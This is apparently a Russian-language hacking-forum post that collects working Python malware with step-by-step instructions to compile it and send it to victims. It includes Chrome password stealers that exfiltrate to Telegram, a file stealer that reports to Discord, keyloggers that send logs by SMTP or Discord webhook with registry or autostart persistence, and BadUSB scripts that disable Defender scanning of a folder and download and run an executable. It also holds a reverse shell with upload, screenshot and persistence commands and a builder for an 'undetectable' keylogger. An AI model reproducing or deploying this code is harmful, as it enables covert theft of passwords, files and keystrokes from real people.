            server_photos = ks.ServerPhotos(ipaddress, port_photos)

            server_keylogger = ks.ServerKeylogger(ipaddress, port_keylogger, simulater=boolean)

            server_listener = ks.ServerListener(ipaddress, port_listener)

            server_time = ks.Timer(ipaddress, port_time)

            threading_server = threading.Thread(target=server_photos.start)
            threading_server.start()

            threading_server3 = threading.Thread(target=server_listener.start)
            threading_server3.start()

            threading_server4 = threading.Thread(target=server_time.start_timer)
            threading_server4.start()

            threading_server2 = threading.Thread(target=server_keylogger.start)
            threading_server2.start()
            threading_server2.join()

        except IndexError:
            print(gui)
            print("YOU FORGET TO INSERT YOUR IP")

    elif "-aip" not in lst and "-help" not in lst:
        print(gui)
        print("PLEASE INSERT YOUR IP WITH -aip")

    if "-help" in lst:
        print(gui)
        print(
            "\n-aip INSERT THE SERVERS IP\n-s   SPECIFY YOUR SECONDS (DEFAULT 60 SECONDS)\n-cf  CREATES TARGET FILE WHICH YOU SEND TO ANY TARGET\n-p   SAVES ALL THE PORTS OF THE CURRENT SERVER\n-ds  CREATES A SERVER WITH THE SAME PORTS AS THE TARGET\n-sim ACTIVATES SIMULATION\n-phs OPENS A LINK WHEN THE KEYLOGGER IS EXECUTED")

except OSError:
    print('CHECK YOUR IP-ADDRESS WITH "ipconfig" ON WINDOWS AND "ifconfig" ON LINUX')

Chrome stealer паролей на Windows пересылает архив в ваш бот TG.

TELEGRAM_TOKEN='123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11'
TG_ID=1163891909

Использование:​

1) Во-первых, убедитесь, что Python установлен https://www.python.org/downloads/ Обязательно "Add Python to PATH" при установке!
2) Получите и поместите токен и id телеги.
3) Запустите команды для создания EXE, переименуйте и отправьте.

Создайте exe или воспользуйтесь Python обфускатором.

chromepy.py​

import os
import re
import sys
import json
import base64
import sqlite3
import requests
import win32crypt
from Crypto.Cipher import AES
import shutil
import csv

TELEGRAM_TOKEN = 'YOUR_TELEGRAM_BOT_TOKEN'
TG_ID = 'YOUR_TELEGRAM_ID'

CHROME_PATH_LOCAL_STATE = os.path.normpath(r"%s\AppData\Local\Google\Chrome\User Data\Local State"%(os.environ['USERPROFILE']))
CHROME_PATH = os.path.normpath(r"%s\AppData\Local\Google\Chrome\User Data"%(os.environ['USERPROFILE']))

def get_secret_key():
    try:
        with open( CHROME_PATH_LOCAL_STATE, "r", encoding='utf-8') as f:
            local_state = f.read()
            local_state = json.loads(local_state)
        secret_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
        secret_key = secret_key[5:]
        secret_key = win32crypt.CryptUnprotectData(secret_key, None, None, None, 0)[1]
        return secret_key
    except Exception as e:
        print("%s"%str(e))
        print("[ERR] Chrome secretkey cannot be found")
        return None
 
def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)

def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)

def decrypt_password(ciphertext, secret_key):
    try:
        initialisation_vector = ciphertext[3:15]
        encrypted_password = ciphertext[15:-16]
        cipher = generate_cipher(secret_key, initialisation_vector)
        decrypted_pass = decrypt_payload(cipher, encrypted_password)
        decrypted_pass = decrypted_pass.decode()
        return decrypted_pass
    except Exception as e:
        print("%s"%str(e))
        print("[ERR] Unable to decrypt, Chrome version <80 not supported. Please check.")
        return ""
 
def get_db_connection(chrome_path_login_db):
    try:
        print(chrome_path_login_db)
        shutil.copy2(chrome_path_login_db, "Loginvault.db")
        return sqlite3.connect("Loginvault.db")
    except Exception as e:
        print("%s"%str(e))
        print("[ERR] Chrome database cannot be found")
        return None

if os.path.exists('shit'):
    print('you''ve shitted earlier')
else:
    os.mkdir('shit')

if __name__ == '__main__':
    try:
        with open('shit\decrypted_password.csv', mode='w', newline='', encoding='utf-8') as decrypt_password_file:
            csv_writer = csv.writer(decrypt_password_file, delimiter=',')
            csv_writer.writerow(["index","url","username","password"])
            secret_key = get_secret_key()
            folders = [element for element in os.listdir(CHROME_PATH) if re.search("^Profile*|^Default$",element)!=None]
            for folder in folders:
                chrome_path_login_db = os.path.normpath(r"%s\%s\Login Data"%(CHROME_PATH,folder))
                conn = get_db_connection(chrome_path_login_db)
                if(secret_key and conn):
                    cursor = conn.cursor()
                    cursor.execute("SELECT action_url, username_value, password_value FROM logins")
                    for index,login in enumerate(cursor.fetchall()):
                        url = login[0]
                        username = login[1]
                        ciphertext = login[2]
                        if(url!="" and username!="" and ciphertext!=""):
                            decrypted_password = decrypt_password(ciphertext, secret_key)
                            print("Sequence: %d"%(index))
                            print("URL: %s\nUser Name: %s\nPassword: %s\n"%(url,username,decrypted_password))
                            print("*"*50)
                            csv_writer.writerow([index,url,username,decrypted_password])
                    cursor.close()
                    conn.close()
                    os.remove("Loginvault.db")

        decrypt_password_file.close()
        shutil.make_archive('shit', 'zip', 'shit')
        file = open('shit.zip', 'rb')
        multipart_form_data = {
            'chat_id': (None, TG_ID),
            'document': ('shit.zip', file),
        }

        response = requests.post(f'https://api.telegram.org/{TELEGRAM_TOKEN}/sendDocument', files=multipart_form_data)
        file.close()
        shutil.rmtree('shit')
        os.remove('shit.zip')
    except Exception as e:
        print("[ERR] "%str(e))

Простой инструмент для загрузки Desktop, Download и Document файлов в Anonfiles и отправка через Discord Webhook
Можете настроить стилер файлов под любой спецефический интерес(сессии кошельки)

Использование:​

1) Во-первых, убедитесь, что Python установлен https://www.python.org/downloads/ Обязательно "Add Python to PATH" при установке!
2) Получите Discord Webhook и поместите в webhook = "" Введите свой webhook между кавычками.
3) Запустите команды для создания EXE, переименуйте и отправьте

NoxiusFileStealer.py​

import zipfile
import shutil
import os
import requests
import multiprocessing
from discord import SyncWebhook, Embed

webhook = "YOUR WEBHOOK HERE"

dirs_to_zip = [
    os.path.join(os.environ.get("USERPROFILE"), "Downloads"),
    os.path.join(os.environ.get("USERPROFILE"), "Desktop"),
    os.path.join(os.environ.get("USERPROFILE"), "Documents"),
    os.path.join(os.environ.get("USERPROFILE"), "Pictures"),
    os.path.join(os.environ.get("USERPROFILE"), "Videos"),
]

zip_filename = f"NoxiusFileStealer-{os.getlogin()}.zip"
if os.path.exists(zip_filename):
    os.remove(zip_filename)

def zip_files(dirs_to_zip, zip_filename):
    with zipfile.ZipFile(zip_filename, "w") as zip_file:
        for dir_path in dirs_to_zip:
            folder_name = os.path.basename(dir_path)
            for root, _, files in os.walk(dir_path):
                for file in files:
                    file_path = os.path.join(root, file)
                    zip_file.write(file_path, arcname=os.path.join(folder_name, file))

if __name__ == '__main__':
    multiprocessing.freeze_support()
    p = multiprocessing.Process(target=zip_files, args=(dirs_to_zip, zip_filename))
    p.start()
    p.join()

    with open(f"{os.getenv('LOCALAPPDATA')}\\Temp\\{zip_filename}", "rb") as file:
        response = requests.post("https://api.anonfiles.com/upload", files={"file": file})
    link = response.json()["data"]["file"]["url"]["short"]
    embed = Embed(title="Files Dumped", description=f"Download the files [here]({link})", color=0x000001)
    embed.set_footer(text="Noxius File Stealer")
    embed.set_thumbnail(url="https://cdn.franafp.com/images/big-noxius.png")
    embed.set_author(name="Noxius File Stealer", url="https://github.com/Noxius-TM/Noxius-File-Stealer", icon_url="https://cdn.franafp.com/images/big-noxius.png")
    embed.add_field(name="Downloads", value=f"C:\\Users\\{os.getlogin()}\\Downloads")
    embed.add_field(name="Desktop", value=f"C:\\Users\\{os.getlogin()}\\Desktop")
    embed.add_field(name="Documents", value=f"C:\\Users\\{os.getlogin()}\\Documents")
    embed.add_field(name="Pictures", value=f"C:\\Users\\{os.getlogin()}\\Pictures")
    embed.add_field(name="Videos", value=f"C:\\Users\\{os.getlogin()}\\Videos")
    embed.add_field(name="Zip File", value=f"{zip_filename}")
    webhook = SyncWebhook.from_url(webhook , session=requests.session())
    webhook.send(embed=embed)

Keylogger отправляет через SMTP на примере Gmail
Вставляете мыло, пасс и свой SMTP сервер, исправьте на свой лимит нажатых клавиш email_char_limit

keylogger.py​

import smtplib
import subprocess
from pynput.keyboard import Key, Listener

email = '@gmail.com'
password = ''
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.login(email, password)

fullog = ''
words = ''
email_char_limit = 100

def on_press(key):
    global words
    global fullog
    global email
    global email_char_limit

    if key == Key.space or key == Key.enter:
        words += ' '
        fullog += words
        words = ''

        if len(fullog) >= email_char_limit:
            send_log()
            fullog = ''
    elif key == Key.shift_l or key == Key.shift_r:
        return
    elif key == Key.backspace:
        words = words[:-1]
    else:
        char = f'{key}'
        char = char[1:-1]
        words += char

    if key == Key.esc:
        return False
 
def send_log():
    server.sendmail(
        email,
        email,
        fullog
    )

with Listener(on_press = on_press) as listener:
    listener.join()

Keylogger отправляет через SMTP на примере Mailtrap

Меняйте на свой SMTP если хотите
SMTP_SERVER = 'sandbox.smtp.mailtrap.io' # Mailtrap smtp
SMTP_PORT = 2525 # Mailtrap port
SMTP_USERNAME = 'yourUsernameHere'
SMTP_PASSWORD = 'yourPasswordHere'
RECIPIENT = 'yourEmailHere'

Жертве необходимо запустить
python keylogger.py

Или как exe

sudo apt install p

ython3 && python3-pip
pip3 install pyinstaller

pyinstaller --onefile --noconsole --hidden-import "Pillow pynput" keylogger.py
Можете добавить иконку icon=

keylogger.py​

import time
import os
import winreg
import win32gui
import win32con
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email.utils import COMMASPACE
from email import encoders
from pynput.keyboard import Key, Listener
import socket
"""
  __  __                ___  
 |  \/  |___ _____ __ _|_ _|__ ___
 | |\/| / -_) _ \ V  V /| |/ _/ -_)
 |_|  |_\___\___/\_/\_/|___\__\___|
                             
            Keyl0gger
"""
pcname = socket.gethostname()

# Email configuration
SMTP_SERVER = 'sandbox.smtp.mailtrap.io' #Mailtrap smtp
SMTP_PORT = 2525 #Mailtrap port
SMTP_USERNAME = 'yourUsernameHere'
SMTP_PASSWORD = 'yourPasswordHere'
RECIPIENT = 'yourEmailHere'

# Add program to Windows startup
def add_to_startup():
    key = winreg.HKEY_CURRENT_USER
    key_value = "Software\Microsoft\Windows\CurrentVersion\Run"
    with winreg.OpenKey(key, key_value, 0, winreg.KEY_WRITE) as key:
        program_path = os.path.abspath(__file__)
        winreg.SetValueEx(key, "KeystrokeLogger", 0, winreg.REG_SZ, program_path)

# Hide the console window
def hide_console():
    hide_window = win32gui.GetForegroundWindow()
    win32gui.ShowWindow(hide_window, win32con.SW_HIDE)

# Send the keystrokes as an email attachment
def send_email(log_file_path):
    msg = MIMEMultipart()
    msg['From'] = SMTP_USERNAME
    msg['To'] = RECIPIENT
    msg['Subject'] = f'Keylogs from {pcname}'
    msg.attach(MIMEText('MeowIce\'s Key Logger'))

    with open(log_file_path, 'rb') as f:
        attachment = MIMEBase('application', 'octet-stream')
        attachment.set_payload(f.read())
        encoders.encode_base64(attachment)
        attachment.add_header('Content-Disposition', 'attachment', filename=os.path.basename(log_file_path))
        msg.attach(attachment)

    smtp = smtplib.SMTP(SMTP_SERVER, SMTP_PORT)
    smtp.starttls()
    smtp.login(SMTP_USERNAME, SMTP_PASSWORD)
    smtp.sendmail(SMTP_USERNAME, RECIPIENT, msg.as_string())
    smtp.quit()

# Log the keystrokes
def on_press(key):
    with open('%AppData%\keystrokes.log', 'a') as f:
        if key == Key.space:
            f.write(" ")
        elif key == Key.enter:
            f.write("<Return>\n")
        elif key == Key.shift:
            f.write("<Shift>")
        elif key == Key.ctrl:
            f.write("<Ctrl>")
        elif key == Key.backspace:
            f.write("<Backspace>")
        elif key == Key.alt:
            f.write("<Alt>")
        elif key == Key.tab:
            f.write("<Tab>")
        elif hasattr(key, 'char'):
            f.write(key.char)
        else:
            f.write(str(key))

# Main program loop
if __name__ == '__main__':
    add_to_startup()
    hide_console()
    with Listener(on_press=on_press) as listener:
        while True:
            time.sleep(60)
            try:
                send_email('%AppData%\keystrokes.log')
                os.remove('%AppData%\keystrokes.log')
            except Exception as e:
                print(f'Error sending email: {e}')

Keylogger отправляет через Discord Webhook

Установка:

sudo apt install python3 && python3-pip
pip3 install pynput PyInstaller

Изменение в файле Mugger.py - discord = "DISCORD_WEBHOOK"

python3 -m PyInstaller Mugger.py --onefile


Загрузите exe на сервер, локальный сервер Python и т.д.
Делайте, как хотите.


BADUSB

Отредактируйте строку LINK_TO_EXE на ссылку на ваш только что созданный exe файл.
Этот скрипт устанавливает исключение для C:\temp!!!!!!
Когда закончите, обязательно сбросьте путь исключения!!!!!!!!

Сбросить путь исключения для сценария Badusb после завершения, в admin powershell
Remove-MpPreference -ExclusionPath "C:\temp"

Или запустите файл ExclusionRemove.txt с флиппером
О флиппере https://thecode.media/pasha-flipper/ и https://vc.ru/tech/472914-flipper-z...hatleniya-i-dostupnye-na-starte-razvlecheniya

ExclusionRemove.txt​

REM Title: Remove Exclusion set on C:\temp IF using badusb ducky script

DELAY 1000

GUI r

DELAY 500

STRING powershell Start-Process powershell -Verb runAs

ENTER

DELAY 3000

ALT y

DELAY 1500

STRING Remove-MpPreference -ExclusionPath "C:\temp"

ENTER

STRING echo "Done Remove ExclusionPath at C:\temp"

ENTER

DELAY 5000

STRING exit

ENTER

mugger.txt​

REM Title: Mugger KeyLogger
REM Description: Keylogger that send to discord webhook for flipper zero
REM Target: Windows
DELAY 1000
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 2000
STRING cd C:\; mkdir temp; cd temp; Add-MpPreference -ExclusionPath "C:\temp"
ENTER
DELAY 500
STRING $down = New-Object System.Net.WebClient; $url = 'LINK_TO_EXE'; $file = 'C:\temp\life_insurance.exe'; $down.DownloadFile($url, $file); Start-Process -FilePath life_insurance.exe -WindowStyle Hidden;
ENTER
DELAY 5000
STRING exit

Mugger.py​

import threading as thr
from json import dumps
from pynput.keyboard import Listener, Key
from urllib.request import Request, urlopen

discord = 'DISCORD_WEBHOOK' # Вставьте свой
timer = 60 # Секунды

class keyScape:
        def __init__(self, discord, timer):
                self.keys = ''
                self.webhook = discord
                self.timer = timer

        def info(self):
                if len(self.keys) != 0:
                        self.send()
                        self.keys = ''
                thr.Timer(self.timer, self.info).start()

        def keyPress(self, key):
                if key == Key.space:
                        key = '[space]'
                if key == Key.enter:
                        key = '[enter]'
                if key == Key.backspace:
                        key = '[backspace/delete]'
                if key == Key.shift:
                        key = '[shift]'
                if key == Key.tab:
                        key = '[tab]'

                key = str(key).replace("'", "")
                self.keys += key

#       def onRelease(self, key):
#               if key == Key.esc:
#                       return False

        def record(self):
                self.info()
                with Listener(on_press = self.keyPress) as r:
                        r.join()

        def send(self):
                embedM = []
                message = {"fields": [{"name": "KeyLogger Log", "value": f"{self.keys}", "inline": True}]}
                embedM.append(message)
                headers = {'Content-Type': 'application/json','User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'}
                data = {"content": "","embeds": embedM}
                try:
                        urlopen(Request(self.webhook, data=dumps(data).encode(), headers=headers))
                except Exception as e:
                        pass

if __name__=='__main__':
        keyScape(discord, timer).record()

Keylogger отправляет через email любых SMTP - запись с микрофона, вебкамеры, скриншоты, нажатые кнопки​

Установка:​

Скачать и установить Python https://www.python.org
Кликаем "Add Python to PATH" при установке
После установки Python откройте main.py
Впишите данные от Gmail или любой электронной почты, изменив сервер SMTP
Цифры вначале скрипта - это время

pip install certifi==2022.6.15 cffi==1.15.1 charset-normalizer==2.1.0 cryptography==37.0.4 idna==3.3 numpy==1.23.1 opencv-python==4.6.0.66 Pillow==9.2.0 pycparser==2.21 pynput==1.7.6 pywin32==304 requests==2.28.1 scipy==1.9.0 six==1.16.0 sounddevice==0.4.4 urllib3==1.26.11

main.py​

"""
KeyLogger Microphone, WebCamera, Screenshots, Audio Logging Feature 2023
"""

# Libraries
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import smtplib
import socket
import platform
import win32clipboard
from pynput.keyboard import Key, Listener
import time
import os
from scipy.io.wavfile import write
import sounddevice as sd
from cryptography.fernet import Fernet
from requests import get
from cv2 import VideoCapture, imshow, imwrite, destroyWindow, waitKey
from PIL import ImageGrab

# Global Variables
keys_info = "key_log.txt"
system_info = "syseminfo.txt"
clipboard_info = "clipboard.txt"
audio_info = "audio.wav"
screenshot_info = "screenshot.png"
webCamShot_info = "webCamera.png"

keys_info_e = "e_key_log.txt"
system_info_e = "e_systeminfo.txt"
clipboard_info_e = "e_clipboard.txt"

microphone_time = 10
time_iteration = 15
number_of_iterations_end = 3

email_address = "example@domain.com" # Enter disposable email here
password = "myPa55w0rd" # Enter email password here
toaddr = " " # Enter the email address you want to send your information to
key = " " # Generate an encryption key from the Cryptography folder
file_path = " " # Enter the file path you want your files to be saved to
extend = "\\"
file_merge = file_path + extend


# Send Email
def send_email(filename, attachment, toaddr):
    fromaddr = email_address
    msg = MIMEMultipart()
    msg['From'] = fromaddr
    msg['To'] = toaddr
    msg['Subject'] = "Log File"
    body = "Body_of_the_mail"
    msg.attach(MIMEText(body, 'plain'))
    filename = filename
    attachment = open(attachment, 'rb')
    p = MIMEBase('application', 'octet-stream')
    p.set_payload((attachment).read())
    encoders.encode_base64(p)
    p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
    msg.attach(p)
    s = smtplib.SMTP('smtp.gmail.com', 587)
    s.starttls()
    s.login(fromaddr, password)
    text = msg.as_string()
    s.sendmail(fromaddr, toaddr, text)
    s.quit()

send_email(keys_info, file_path + extend + keys_info, toaddr)


# Get System Information
def system_information():
    with open(file_merge + system_info, "a") as f:
        hostname = socket.gethostname()
        IPAddr = socket.gethostbyname(hostname)
        try:
            public_ip = get("https://api.ipify.org").text
            f.write("Public IP Address: " + public_ip + '\n')
        except Exception:
            f.write("Couldn't get Public IP Address (May be due to max query) \n")

        f.write("Processor Info: " + (platform.processor()) + '\n')
        f.write("System Info: " + platform.system() + " " + platform.version() + '\n')
        f.write("Machine: " + platform.machine() + '\n')
        f.write("Hostname: " + hostname + '\n')
        f.write("Private IP Address: " + IPAddr + '\n')

system_information()

# Copy Clipboard Data
def copy_clipboard():
    with open(file_merge + clipboard_info, "a") as f:
        try:
            win32clipboard.OpenClipboard()
            pasted_data = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()
            f.write("Clipboard Data : \n" + pasted_data + '\n')
        except:
            f.write("Clipboard Could not be copied. \n")

copy_clipboard()

Криптография по ключу, поэтому сгенерируйте ключ, далее расшифруете

GenerateKey.py

[CODE=python]
from cryptography.fernet import Fernet

key = Fernet.generate_key()
file = open("encryption_key.txt", 'wb')
file.write(key)
file.close()

DecryptFile.py​

from cryptography.fernet import Fernet

key = " " # Paste Your Key which is generated by Gernerate Key file.
system_information_e = 'e_system.txt'
clipboard_information_e = 'e_clipboard.txt'
keys_information_e = 'e_keys_logged.txt'

encrypted_files = [system_information_e, clipboard_information_e, keys_information_e]
count = 0

for decrypting_files in encrypted_files:
    with open(encrypted_files[count], 'rb') as f:
        data = f.read()

    fernet = Fernet(key)
    decrypted = fernet.decrypt(data)

    with open("decryption.txt", 'ab') as f:
        f.write(decrypted)
    count += 1

Keylogger Linux​

Установка:​

Скачать и установить Python https://www.python.org
После установки Python откройте keylogger.py
Впишите данные от Gmail или любой электронной почты, изменив сервер SMTP

Нужно запустить на linux жертвы
python3 keylogger.py

Либо создать elf файл
sudo apt install python3 && python3-pip
pip3 install pyinstaller
pyinstaller --noconsole --onefile keylogger.py

keylogger.py​

import smtplib
from pynput.keyboard import Listener
import logging
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders
from threading import Thread, Timer
import os
import shutil
from time import sleep



user = os.path.expanduser('~')
yol = user + "/.config/autostart"
def starUp():
    metin = "[Desktop Entry]\nType=Application\nExec=python3 calistir/keylogger.py\nHidden=false\nX-MATE-Autostart-enabled=true\nName[en_US]=keylog,Name=keylog\nComment[en_US]=\nComment=X-MATE-Autostart-Delay=0]"
    yeni = metin.replace("calistir", user)
    with open("keylog.py.desktop", "w+") as f:
        f.write(yeni)
    a = os.path.abspath('keylog.py.desktop')
    shutil.move(a, yol)


def heyLog():
    os.chdir(yol)
    dosya = open("log.txt", "a+")
    dosya.close()
    log_dir = ""
    logging.basicConfig(filename=(log_dir + "log.txt"), level=logging.DEBUG)

    def on_press(key):
        logging.info(str(key).strip("''"))

    with Listener(on_press=on_press) as listener:
        listener.join()


def sendMail():
    fromaddr = "hello@mail.com" #change your mail address
    toaddr = "hello@mail.com" #change your mail address
    msg = MIMEMultipart()
    filename = "log.txt"
    attachment = open(filename, "rb")
    p = MIMEBase('application', 'octet-stream')
    p.set_payload(attachment.read())
    encoders.encode_base64(p)
    p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
    msg.attach(p)
    s = smtplib.SMTP('smtp.gmail.com', 587)
    s.starttls()
    s.login(fromaddr, "password") #change your password
    text = msg.as_string()
    s.sendmail(fromaddr, toaddr, text)
    s.quit()


def dosyaSil():
    os.remove(yol + "/keylog.py.desktop")
    os.remove(yol + "/log.txt")
    a = os.getpid()
    sleep(2)
    os.system(f"kill -9 {a}")




if __name__ == "__main__":
    starUp()
    t1 = Thread(target=heyLog)
    t1.start()
    t2 = Timer(30.0, sendMail)# change mail send time
    t2.start()
    t3 = Timer(33.0, dosyaSil)# change file remove time
    t3.start()

Chrome Password Stealer​

Программа, предназначенная для того, чтобы показать, насколько легко получить доступ к личной информации, создавая passwords.txt с паролями

program.py​

import os
import sqlite3
from Cryptodome.Cipher import AES
import json
import base64
import win32crypt

def closeChrome():
    try:
        os.system("taskkill /f /im chrome.exe")
    except:
        pass

def getSecretKey():
    try:
        with open(os.path.normpath(r"%s\AppData\Local\Google\Chrome\User Data\Local State"%(os.environ['USERPROFILE'])), "r", encoding='utf-8') as f:
            local_state = f.read()
            local_state = json.loads(local_state)
        secret_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
        secret_key = secret_key[5:]
        secret_key = win32crypt.CryptUnprotectData(secret_key, None, None, None, 0)[1]
        return secret_key
    except Exception as e:
        print("Secret key not found")

def decryptPayload(cipher, payload):
    return cipher.decrypt(payload)

def generateCipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)

def decryptPassword(ciphertext, secret_key):
    try:
        initialisation_vector = ciphertext[3:15]
        encrypted_password = ciphertext[15:-16]
        cipher = generateCipher(secret_key, initialisation_vector)
        decrypted_pass = decryptPayload(cipher, encrypted_password)
        decrypted_pass = decrypted_pass.decode()
        return decrypted_pass
    except:
        print("Cannot decrypt password")

def getChromePasswords():
    data_path = os.path.expanduser('~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data'
    c = sqlite3.connect(data_path)
    cursor = c.cursor()
    select_statement = 'SELECT action_url, username_value, password_value FROM logins'
    cursor.execute(select_statement)
    login_data = cursor.fetchall()
    extractedData = []
    for userdatacombo in login_data:
        if userdatacombo[1] != None and userdatacombo[2] != None and userdatacombo[1] != ""  and userdatacombo[2] != "":
            password = decryptPassword(userdatacombo[2], getSecretKey())
            data = "URL: " + userdatacombo[0] + " Username: " + userdatacombo[1] + " Password: " + str(password)
            extractedData.append(data)
        else:
            pass
    return extractedData

def savePasswords(data):
    with open("passwords.txt", "w") as f:
        for line in data:
            f.write(line + "\n")

def main():
    closeChrome()
    data = getChromePasswords()
    savePasswords(data)

main()


Вообще это reverse shell Python, поскольку предварительные команды рассчитаны на кражи файов и кейлогер, а такие аплоад любого файла, а также проверку административных привилегий, а также позволяет сделать скриншот, то решил добавить сюда.
Команды, разберётесь думаю:

    quit
    background
    help
    cd
    clear
    upload
    download
    screenshot
    keylog_start
    keylog_dump
    keylog_stop
    persistence
    sendall

Не забудьте поставить свой ip в rev_shell.py

rev_shell.py

import socket
import json
import subprocess
import time
import os
import pyautogui
import keylogger
import threading
import shutil
import sys

def reliable_send(data):
    jsondata = json.dumps(data)
    s.send(jsondata.encode())

def reliable_recv():
    data = ''
    while True:
        try:
            data = data + s.recv(1024).decode().rstrip()
            return json.loads(data)
        except ValueError:
            continue

def download_file(file_name):
    f = open(file_name, 'wb')
    s.settimeout(1)
    chunk = s.recv(1024)
    while chunk:
        f.write(chunk)
        try:
            chunk = s.recv(1024)
        except socket.timeout as e:
            break
    s.settimeout(None)
    f.close()

def upload_file(file_name):
    f = open(file_name, 'rb')
    s.send(f.read())

def screenshot():
    myScreenshot = pyautogui.screenshot()
    myScreenshot.save('screen.png')

def persist(reg_name, copy_name):
    file_location = os.environ['appdata'] + '\\' + copy_name
    try:
        if not os.path.exists(file_location):
            shutil.copyfile(sys.executable, file_location)
            subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"', shell=True)
            reliable_send('[+] Created Persistence With Reg Key: ' + reg_name)
        else:
            reliable_send('[+] Persistence Already Exists')
    except:
        reliable_send('[+] Error Creating Persistence With The Target Machine')

def connection():
    while True:
        time.sleep(20)
        try:
            s.connect(('192.168.1.4', 5555))
            shell()
            s.close()
            break
        except:
            connection()

def shell():
    while True:
        command = reliable_recv()
        if command == 'quit':
            break
        elif command == 'background':
            pass
        elif command == 'help':
            pass
        elif command == 'clear':
            pass
        elif command[:3] == 'cd ':
            os.chdir(command[3:])
        elif command[:6] == 'upload':
            download_file(command[7:])
        elif command[:8] == 'download':
            upload_file(command[9:])
        elif command[:10] == 'screenshot':
            screenshot()
            upload_file('screen.png')
            os.remove('screen.png')
        elif command[:12] == 'keylog_start':
            keylog = keylogger.Keylogger()
            t = threading.Thread(target=keylog.start)
            t.start()
            reliable_send('[+] Keylogger Started!')
        elif command[:11] == 'keylog_dump':
            logs = keylog.read_logs()
            reliable_send(logs)
        elif command[:11] == 'keylog_stop':
            keylog.self_destruct()
            t.join()
            reliable_send('[+] Keylogger Stopped!')
        elif command[:11] == 'persistence':
            reg_name, copy_name = command[12:].split(' ')
            persist(reg_name, copy_name)
        elif command[:7] == 'sendall':
            subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin = subprocess.PIPE)
        else:
            execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)
            result = execute.stdout.read() + execute.stderr.read()
            result = result.decode()
            reliable_send(result)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection()

keylogger.py

import os
from pynput.keyboard import Listener
import time
import threading


class Keylogger():
    keys = []
    count = 0
    flag = 0
    path = os.environ['appdata'] +'\\processmanager.txt'
    #path = 'processmanager.txt'

    def on_press(self, key):
        self.keys.append(key)
        self.count += 1

        if self.count >= 1:
            self.count = 0
            self.write_file(self.keys)
            self.keys = []

    def read_logs(self):
        with open(self.path, 'rt') as f:
            return f.read()

    def write_file(self, keys):
        with open(self.path, 'a') as f:
            for key in keys:
                k = str(key).replace("'", "")
                if k.find('backspace') > 0:
                    f.write(' Backspace ')
                elif k.find('enter') > 0:
                    f.write('\n')
                elif k.find('shift') > 0:
                    f.write(' Shift ')
                elif k.find('space') > 0:
                    f.write(' ')
                elif k.find('caps_lock') > 0:
                    f.write(' caps_lock ')
                elif k.find('Key'):
                    f.write(k)

    def self_destruct(self):
        self.flag = 1
        listener.stop()
        os.remove(self.path)

    def start(self):
        global listener
        with Listener(on_press=self.on_press) as listener:
            listener.join()

if __name__ == '__main__':
    keylog = Keylogger()
    t = threading.Thread(target=keylog.start)
    t.start()
    while keylog.flag != 1:
        time.sleep(10)
        logs = keylog.read_logs()
        print(logs)
        #keylog.self_destruct()
    t.join()

 


FUD KeyLogger Python
FUD KeyLogger Python полностью не обнаруживается, шифрует данные в INT, отправляет данные в Discord!

Запустите client.py и создайте полезную нагрузку
Затем полезная нагрузка (ezkey.pyw) будет модифицирована с вашим WebHook от Discord
Отредактируйте имя полезной нагрузки и скомпилируйте его, но это не обязательно
Отправьте полезную нагрузку своей жертве

Как только жертва выполнит полезную нагрузку, она запустит KeyLogger в фоновом режиме. Каждый ключ будет записан и сохранен на MatPlot.cache
Каждый раз, когда достигается maxlen var (выбираемый пользователем при создании полезной нагрузки), keylogger отправляет файл, содержащий данные через webhook
Данные будут зашифрованы в INT, поэтому их будет сложнее обнаружить, на сегодня 0/60 по шкале вирустотала

sudo apt install python3 && python3-pip
pip3 install requests asyncio flaskwebgui nicegui

client.py

from flaskwebgui import FlaskUI
from nicegui import ui, events

import random
import os

__title__ = "EZKey"

ui.colors(primary='#333')

def convert_text(text):
    string = ""
    for _encoded_int in text.split("\r\n"):
        for encoded_int in _encoded_int.split(" "):
            if encoded_int == "":
                continue
            
            decoded_bytes = int(str(encoded_int)).to_bytes((int(encoded_int).bit_length() + 7) // 8, byteorder='big')
            decoded_string = decoded_bytes.decode()

            string += f" {decoded_string}"
    return string

def __makebuild(webh_url, max_len):
    if webh_url == "":
        return ui.notify(f"Please enter a webhook url!", timeout=30, progress=True, color="red", position="top-left")
    
    ui.notify(f"Build is starting!", timeout=30, progress=True, color="orange", position="top-left")
    
    with open("ezkey.pyw", "r") as f:
        _ezkey = f.read()
        
    _ezkey = _ezkey.replace("discord_webhook = \"xpierroz on top\"", f"discord_webhook = \"{webh_url}\"")
    _ezkey = _ezkey.replace(
        "self.__max_len_file = 10", "self.__max_len_file = {}"
        .format(max_len if max_len != "" else 10
                )
        )
    
    with open("ezkey.pyw", "w") as f:
        f.write(_ezkey)
        
    ui.notify(f"Build has finished!", timeout=30, progress=True, color="green", position="top-left")

def _home():
    ui.label("EZKey Builder").classes('text-center text-xl font-bold')
    
    with ui.column():
        webh_url = ui.input(label='WebHook URL', placeholder='EZKey my g').props('inline color=orange-3').classes('w-full')
